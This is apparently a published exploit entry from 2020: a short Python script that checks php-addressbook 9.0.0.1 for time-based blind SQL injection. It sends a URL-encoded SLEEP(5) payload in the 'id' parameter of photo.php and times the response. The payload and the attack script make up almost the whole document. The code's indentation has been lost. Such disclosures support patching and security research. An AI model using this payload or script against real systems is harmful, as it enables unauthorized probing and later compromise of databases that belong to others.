# Title: addressbook 9.0.0.1 - 'id' SQL Injection
# Date: 2020-04-01
# Author: David Velazquez a.k.a. d4sh&r000
# vulnerable application: https://sourceforge.net/projects/php-addressbook/files/latest/download
# vulnerable version: 9.0.0.1
# Discription: addressbook 9.0.0.1 time-based blind SQL injection
# Tested On: Ubuntu Server 20.04 LTS
# Platform: PHP
# Type: webapp
# Use:
# addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1'
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import requests
def isVulnerable(URL):
"""Check if the URL is vulnerable to ime-based blind SQL injection"""
response = requests.get(URL+'%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy')
s=response.elapsed.total_seconds()
if s>5:#I put a sleep sentence to test the bug
sys.stdout.write('[+] Aplication is vulnerable!!!\n')
else:
sys.stdout.write('[+] Aplication NOT vulnerable\n')
if __name__ == "__main__":
isVulnerable(sys.argv[1])